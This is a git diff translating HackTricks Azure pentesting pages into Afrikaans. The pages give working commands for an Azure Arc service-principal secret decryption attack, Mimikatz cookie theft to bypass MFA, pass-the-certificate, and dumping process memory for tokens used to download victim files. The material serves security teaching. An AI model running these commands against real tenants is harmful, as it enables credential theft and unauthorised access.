-2. Install the latest stable release of PowerShell:
-
+2. Installeer die nuutste stabiele weergawe van PowerShell:
 ```sh
 brew install powershell/tap/powershell
 ```
-
-3. Run PowerShell:
-
+3. Voer PowerShell uit:
 ```sh
 pwsh
 ```
-
-4. Update:
-
+4. Opdatering:
 ```sh
 brew update
 brew upgrade powershell
 ```
-
-## Main Enumeration Tools
+## Hoof Enumerasie Gereedskap
 
 ### az cli
 
-[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts.
+[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is 'n kruis-platform hulpmiddel geskryf in Python vir die bestuur en administrasie van (meeste) Azure en Entra ID hulpbronne. Dit maak verbinding met Azure en voer administratiewe opdragte uit via die opdraglyn of skripte.
 
-Follow this link for the [**installation instructions¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
+Volg hierdie skakel vir die [**installasie instruksies¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
 
-Commands in Azure CLI are structured using a pattern of: `az <service> <action> <parameters>`
+Opdragte in Azure CLI is gestruktureer volgens 'n patroon van: `az <service> <action> <parameters>`
 
 #### Debug | MitM az cli
 
-Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
-
+Deur die parameter **`--debug`** is dit moontlik om al die versoeke wat die hulpmiddel **`az`** stuur te sien:
 ```bash
 az account management-group list --output table --debug
 ```
-
-In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
+Om 'n **MitM** op die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy doen: 
 
 {{#tabs }}
 {{#tab name="Bash" }}
-
 ```bash
 export ADAL_PYTHON_SSL_NO_VERIFY=1
 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -90,64 +79,53 @@ export HTTP_PROXY="http://127.0.0.1:8080"
 openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
 export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
 ```
-
 {{#endtab }}
 
 {{#tab name="PS" }}
-
 ```bash
 $env:ADAL_PYTHON_SSL_NO_VERIFY=1
 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
 $env:HTTPS_PROXY="http://127.0.0.1:8080"
 $env:HTTP_PROXY="http://127.0.0.1:8080"
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### Az PowerShell
 
-Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line.
+Azure PowerShell is 'n module met cmdlets om Azure hulpbronne direk vanaf die PowerShell-opdraglyn te bestuur.
 
-Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
+Volg hierdie skakel vir die [**installasie-instruksies**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
 
-Commands in Azure PowerShell AZ Module are structured like: `<Action>-Az<Service> <parameters>`
+Opdragte in Azure PowerShell AZ Module is gestruktureer soos: `<Action>-Az<Service> <parameters>`
 
 #### Debug | MitM Az PowerShell
 
-Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
-
+Deur die parameter **`-Debug`** is dit moontlik om al die versoeke wat die hulpmiddel stuur te sien:
 ```bash
 Get-AzResourceGroup -Debug
 ```
-
-In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
+Om 'n **MitM** op die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy die omgewing veranderlikes `HTTPS_PROXY` en `HTTP_PROXY` instel volgens die [**dokumentasie**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
 
 ### Microsoft Graph PowerShell
 
-Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features.
+Microsoft Graph PowerShell is 'n kruis-platform SDK wat toegang tot al die Microsoft Graph API's moontlik maak, insluitend dienste soos SharePoint, Exchange, en Outlook, met 'n enkele eindpunt. Dit ondersteun PowerShell 7+, moderne verifikasie via MSAL, eksterne identiteite, en gevorderde navrae. Met 'n fokus op die minste privaatheidstoegang, verseker dit veilige bedrywighede en ontvang gereelde opdaterings om in lyn te wees met die nuutste Microsoft Graph API kenmerke.
 
-Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
+Volg hierdie skakel vir die [**installasie instruksies**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
 
-Commands in Microsoft Graph PowerShell are structured like: `<Action>-Mg<Service> <parameters>`
+Opdragte in Microsoft Graph PowerShell is gestruktureer soos: `<Action>-Mg<Service> <parameters>`
 
-#### Debug Microsoft Graph PowerShell
-
-Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
+#### Foutopsporing van Microsoft Graph PowerShell
 
+Met die parameter **`-Debug`** is dit moontlik om al die versoeke wat die hulpmiddel stuur te sien:
 ```bash
 Get-MgUser -Debug
 ```
-
 ### ~~**AzureAD Powershell**~~
 
-The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID.
+Die Azure Active Directory (AD) module, nou **verouderd**, is deel van Azure PowerShell vir die bestuur van Azure AD hulpbronne. Dit bied cmdlets vir take soos die bestuur van gebruikers, groepe, en aansoekregistrasies in Entra ID.
 
 > [!TIP]
-> This is replaced by Microsoft Graph PowerShell
-
-Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD).
-
-
-
+> Dit is vervang deur Microsoft Graph PowerShell
 
+Volg hierdie skakel vir die [**installasie-instruksies**](https://www.powershellgallery.com/packages/AzureAD).
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
index e53ceb412..79e592b37 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
@@ -4,17 +4,16 @@
 
 ### Identifying the Issues
 
-Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1.
+Azure Arc stel die integrasie van nuwe interne bedieners (aangeslote domeinbedieners) in Azure Arc via die Groep Beleidsobjek metode moontlik. Om dit te fasiliteer, bied Microsoft 'n ontplooiing toolkit wat nodig is om die aanmeldproses te begin. Binne die ArcEnableServerGroupPolicy.zip lêer, kan die volgende skripte gevind word: DeployGPO.ps1, EnableAzureArc.ps1, en AzureArcDeployment.psm1.
 
-When executed, the DeployGPO.ps1 script performs the following actions:
+Wanneer uitgevoer, voer die DeployGPO.ps1 skrip die volgende aksies uit:
 
-1. Creates the Azure Arc Servers Onboarding GPO within the local domain.
-2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package.
+1. Skep die Azure Arc Servers Onboarding GPO binne die plaaslike domein.
+2. Kopieer die EnableAzureArc.ps1 aanmeldskrip na die aangewese netwerkdeel wat geskep is vir die aanmeldproses, wat ook die Windows installer pakket bevat.
 
-When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script.
-
-An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments.
+Wanneer hierdie skrip uitgevoer word, moet stelselsadmins twee hoofparameters verskaf: **ServicePrincipalId** en **ServicePrincipalClientSecret**. Daarbenewens vereis dit ander parameters soos die domein, die FQDN van die bediener wat die deel huisves, en die deelnaam. Verdere besonderhede soos die tenant ID, hulpbron groep, en ander nodige inligting moet ook aan die skrip verskaf word.
 
+'n Geënkripteerde geheim word in die AzureArcDeploy gids op die gespesifiseerde deel gegenereer met behulp van DPAPI-NG enkripsie. Die geënkripteerde geheim word in 'n lêer genaamd encryptedServicePrincipalSecret gestoor. Bewyse hiervan kan in die DeployGPO.ps1 skrip gevind word, waar die enkripsie uitgevoer word deur ProtectBase64 met $descriptor en $ServicePrincipalSecret as insette aan te roep. Die descriptor bestaan uit die Domein Rekenaar en Domein Beheerder groep SIDs, wat verseker dat die ServicePrincipalSecret slegs deur die Domein Beheerders en Domein Rekenaar sekuriteitsgroepe ontkripteer kan word, soos opgemerk in die skrip kommentaar.
 ```powershell
 # Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups
 $DomainComputersSID = "SID=" + $DomainComputersSID
@@ -23,24 +22,20 @@ $descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR "
 Import-Module $PSScriptRoot\AzureArcDeployment.psm1
 $encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret)
 ```
-
 ### Exploit
 
-We have the follow conditions:
+Ons het die volgende toestande:
 
-1. We have successfully penetrated the internal network.
-2. We have the capability to create or assume control of a computer account within Active Directory.
-3. We have discovered a network share containing the AzureArcDeploy directory.
-
-There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations.
+1. Ons het suksesvol die interne netwerk binnegedring.
+2. Ons het die vermoë om 'n rekenaarrekening binne Active Directory te skep of te beheer.
+3. Ons het 'n netwerkdeel ontdek wat die AzureArcDeploy-gids bevat.
 
+Daar is verskeie metodes om 'n masjienrekening binne 'n AD-omgewing te verkry. Een van die mees algemene is om die masjienrekeningkwota te benut. 'n Ander metode behels die kompromittering van 'n masjienrekening deur kwesbare ACL's of verskeie ander miskonfigurasies.
 ```powershell
 Import-MKodule powermad
 New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
 ```
-
-Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe.
-
+Sodra 'n masjienrekening verkry is, is dit moontlik om te autentiseer met hierdie rekening. Ons kan of die runas.exe-opdrag met die netonly-vlag gebruik of pass-the-ticket met Rubeus.exe gebruik.
 ```powershell
 runas /user:fake01$ /netonly powershell
 ```
@@ -48,9 +43,7 @@ runas /user:fake01$ /netonly powershell
 ```powershell
 .\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr
 ```
-
-By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret.
-
+Deur die TGT vir ons rekenaarrekening in geheue te stoor, kan ons die volgende skrip gebruik om die dienshoofsekrte te ontsleutel.
 ```powershell
 Import-Module .\AzureArcDeployment.psm1
 
@@ -59,17 +52,12 @@ $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedSer
 $ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret)
 $ebs
 ```
+Alternatiewelik kan ons [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG) gebruik.
 
-Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG).
-
-At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal.
+Op hierdie punt kan ons die oorblywende inligting versamel wat nodig is om met Azure te verbind vanaf die ArcInfo.json-lêer, wat op dieselfde netwerkdeel as die encryptedServicePrincipalSecret-lêer gestoor is. Hierdie lêer bevat besonderhede soos: TenantId, servicePrincipalClientId, ResourceGroup, en meer. Met hierdie inligting kan ons Azure CLI gebruik om as die gecompromitteerde dienshoof te autentiseer.
 
 ## References
 
 - [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
index 2ddcbb0a5..04abc0d61 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
@@ -1,43 +1,39 @@
-# Az - Local Cloud Credentials
+# Az - Plaaslike Wolk Krediete
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Local Token Storage and Security Considerations
+## Plaaslike Token Berging en Sekuriteits oorwegings
 
-### Azure CLI (Command-Line Interface)
+### Azure CLI (Opdraglyn Koppelvlak)
 
-Tokens and sensitive data are stored locally by Azure CLI, raising security concerns:
+Tokens en sensitiewe data word plaaslik deur Azure CLI gestoor, wat sekuriteits bekommernisse oproep:
 
-1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\<username>\.Azure`.
-2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details.
-3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as:
-   - Executed commands with credentials embedded.
-   - URLs accessed using tokens, potentially revealing sensitive information.
+1. **Toegangstokens**: Gestoor in platte teks binne `accessTokens.json` geleë by `C:\Users\<username>\.Azure`.
+2. **Subskripsie Inligting**: `azureProfile.json`, in dieselfde gids, hou subskripsie besonderhede.
+3. **Loglêers**: Die `ErrorRecords` vouer binne `.azure` mag loglêers bevat met blootgestelde krediete, soos:
+- Uitgevoerde opdragte met krediete ingebed.
+- URL's wat met tokens toeganklik gemaak is, wat moontlik sensitiewe inligting kan onthul.
 
 ### Azure PowerShell
 
-Azure PowerShell also stores tokens and sensitive data, which can be accessed locally:
+Azure PowerShell stoor ook tokens en sensitiewe data, wat plaaslik toeganklik is:
 
-1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\<username>\.Azure`, stores access tokens in plaintext.
-2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`.
-3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access.
+1. **Toegangstokens**: `TokenCache.dat`, geleë by `C:\Users\<username>\.Azure`, stoor toegangstokens in platte teks.
+2. **Diens Prinsipaal Geheimen**: Hierdie word ongeënkripteer in `AzureRmContext.json` gestoor.
+3. **Token Stoor Funksie**: Gebruikers het die vermoë om tokens te behou met die `Save-AzContext` opdrag, wat versigtig gebruik moet word om ongeoorloofde toegang te voorkom.
 
-## Automatic Tools to find them
+## Outomatiese Gereedskap om hulle te vind
 
 - [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe)
 - [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1)
 
-## Security Recommendations
+## Sekuriteits Aanbevelings
 
-Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by:
+Aangaande die berging van sensitiewe data in platte teks, is dit noodsaaklik om hierdie lêers en gidse te beveilig deur:
 
-- Limiting access rights to these files.
-- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes.
-- Employing encryption for sensitive files where possible.
-- Educating users about the risks and best practices for handling such sensitive information.
+- Toegangregte tot hierdie lêers te beperk.
+- Gereeld hierdie gidse te monitor en te oudit vir ongeoorloofde toegang of onverwagte veranderinge.
+- Enkripsie vir sensitiewe lêers waar moontlik toe te pas.
+- Gebruikers op te voed oor die risiko's en beste praktyke vir die hantering van sulke sensitiewe inligting.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
index f2a5f2f4d..cfdfdbad0 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
@@ -4,40 +4,32 @@
 
 ## Pass the Certificate (Azure)
 
-In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism.
+In Azure-verbonden masjiene is dit moontlik om van een masjien na 'n ander te autentiseer met behulp van sertifikate wat **uitgereik moet word deur Azure AD CA** vir die vereiste gebruiker (as die onderwerp) wanneer beide masjiene die **NegoEx** autentifikasiemeganisme ondersteun.
 
-In super simplified terms:
+In super vereenvoudigde terme:
 
-- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**.
-- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD**
-- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
+- Die masjien (klient) wat die verbinding begin **het 'n sertifikaat van Azure AD vir 'n gebruiker** nodig.
+- Klient skep 'n JSON Web Token (JWT) kop wat PRT en ander besonderhede bevat, teken dit met behulp van die Afgeleide sleutel (met die sessiesleutel en die sekuriteitskonteks) en **stuur dit na Azure AD**.
+- Azure AD verifieer die JWT-handtekening met behulp van die klient se sessiesleutel en sekuriteitskonteks, kontroleer die geldigheid van PRT en **antwoord** met die **sertifikaat**.
 
-In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
+In hierdie scenario en nadat al die inligting wat nodig is vir 'n [**Pass the PRT**](pass-the-prt.md) aanval verkry is:
 
-- Username
-- Tenant ID
+- Gebruikersnaam
+- Huurder ID
 - PRT
-- Security context
-- Derived Key
-
-It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
+- Sekuriteitskonteks
+- Afgeleide Sleutel
 
+Dit is moontlik om 'n **P2P-sertifikaat** vir die gebruiker aan te vra met die hulpmiddel [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
 ```bash
 RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE]
 ```
-
-The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user.
-
+Die sertifikate sal so lank duur as die PRT. Om die sertifikaat te gebruik, kan jy die python hulpmiddel [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) gebruik wat **authentiseer** na die afstandmasjien, **PSEXEC** uitvoer en 'n **CMD** op die slagoffer masjien oopmaak. Dit sal ons toelaat om Mimikatz weer te gebruik om die PRT van 'n ander gebruiker te verkry.
 ```bash
 Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
 ```
+## Verwysings
 
-## References
-
-- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
+- Vir meer besonderhede oor hoe Pass the Certificate werk, kyk na die oorspronklike pos [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
index f6695c40a..4a2ecec8d 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
@@ -2,40 +2,34 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Why Cookies?
+## Waarom Koekies?
 
-Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate.
+Bladsy **koekies** is 'n uitstekende meganisme om **authentisering en MFA** te **omseil**. Omdat die gebruiker reeds in die toepassing geverifieer is, kan die sessie **koekie** net gebruik word om **data** as daardie gebruiker te **toegang**, sonder om weer te verifieer.
 
-You can see where are **browser cookies located** in:
+Jy kan sien waar **bladsy koekies geleë** is in:
 
 {{#ref}}
 https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome
 {{#endref}}
 
-## Attack
+## Aanval
 
-The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in:
+Die uitdagende deel is dat daardie **koekies geënkripteer** is vir die **gebruiker** via die Microsoft Data Protection API (**DPAPI**). Dit is geënkripteer met kriptografiese [sleutels wat aan die gebruiker gekoppel is](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) waartoe die koekies behoort. Jy kan meer inligting hieroor vind in:
 
 {{#ref}}
 https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
 {{#endref}}
 
-With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command:
-
+Met Mimikatz in die hand, kan ek **'n gebruiker se koekies** onttrek, selfs al is hulle geënkripteer met hierdie opdrag:
 ```bash
 mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
 ```
+Vir Azure, is ons bekommerd oor die outentikasie koekies insluitend **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, en **`ESTSAUTHLIGHT`**. Daardie is daar omdat die gebruiker onlangs aktief op Azure was.
 
-For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately.
-
-Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated.
+Net navigeer na login.microsoftonline.com en voeg die koekie **`ESTSAUTHPERSISTENT`** (gegenereer deur die “Bly Teken In” opsie) of **`ESTSAUTH`** by. En jy sal outentiseer wees.
 
 ## References
 
 - [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
index 28bc5b415..16d5854fe 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -1,11 +1,7 @@
-# Az - Phishing Primary Refresh Token (Microsoft Entra)
+# Az - Phishing Primêre Vernuwings Teken (Microsoft Entra)
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
+**Kontroleer:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
index a79c7a659..376703f13 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -1,11 +1,7 @@
-# Az - Primary Refresh Token (PRT)
+# Az - Primêre Vernuwings Teken (PRT)
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
+**Kyk na die pos in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) alhoewel 'n ander pos wat dieselfde verduidelik, gevind kan word in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
index 1ba819b3a..86ce7ccb4 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
@@ -2,16 +2,15 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## **Basic Information**
+## **Basiese Inligting**
 
-As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
+Soos verduidelik in [**hierdie video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), sommige Microsoft sagteware wat met die wolk gesinkroniseer is (Excel, Teams...) mag **toegangstokens in duidelike teks in geheue stoor**. So net **dumping** die **geheue** van die proses en **grepping vir JWT tokens** mag jou toegang gee tot verskeie hulpbronne van die slagoffer in die wolk terwyl jy MFA omseil.
 
-Steps:
-
-1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
-2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
-3. Find the tokens that interest you the most and run tools over them:
+Stappe:
 
+1. Dump die excel prosesse wat gesinkroniseer is met die EntraID gebruiker met jou gunsteling hulpmiddel.
+2. Voer in: `string excel.dmp | grep 'eyJ0'` en vind verskeie tokens in die uitvoer
+3. Vind die tokens wat jou die meeste interesseer en voer hulpmiddels oor hulle uit:
 ```bash
 # Check the identity of the token
 curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
@@ -31,11 +30,6 @@ curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sit
 ┌──(magichk㉿black-pearl)-[~]
 └─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
 ```
-
-**Note that these kind of access tokens can be also found inside other processes.**
+**Let daarop dat hierdie tipe toegangstokens ook binne ander prosesse gevind kan word.**
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
index 39ee71d6c..e4bc76005 100644
--- a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
@@ -1,11 +1,7 @@
-# Az - Permissions for a Pentest
+# Az - Toestemmings vir 'n Pentest
 
 {{#include ../../banners/hacktricks-training.md}}
 
